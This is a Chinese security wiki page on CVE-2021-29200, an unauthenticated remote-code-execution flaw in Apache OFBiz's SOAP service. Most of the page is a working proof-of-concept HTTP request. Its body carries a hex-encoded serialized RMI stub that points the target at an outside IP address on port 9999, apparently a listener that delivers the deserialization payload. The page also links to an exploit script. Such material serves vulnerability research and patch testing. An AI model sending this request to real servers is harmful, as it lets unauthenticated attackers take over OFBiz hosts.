menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Vulnerability-棱角社区(Vulnerability)项目漏洞-20210715 chevron_right Apache OFBiz RMI Bypass RCE(CVE-2021-29200).md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Apache OFBiz RMI Bypass RCE(CVE-2021-29200).md
    1.53 KB / 2021-05-21 09:14:38
        # Apache OFBiz RMI Bypass RCE(CVE-2021-29200)


由于Apache OFBiz存在Java RMI反序列化漏洞,未经身份验证的用户可以执行RCE攻击,导致服务器被接管。

影响版本:
Apache OFBiz < 17.12.07

详细分析可以见:https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw

poc:

```
POST /webtools/control/SOAPService HTTP/1.1
Host: xxx
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 877


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">  
  <soapenv:Header/>  
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078</cus-obj>
          </map-Key>  
          <map-Value>  
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
```

poc.py:https://github.com/r0ckysec/CVE-2021-29200

ref:

* https://github.com/r0ckysec/CVE-2021-29200
* https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
* https://xz.aliyun.com/t/9556
    links
    file_download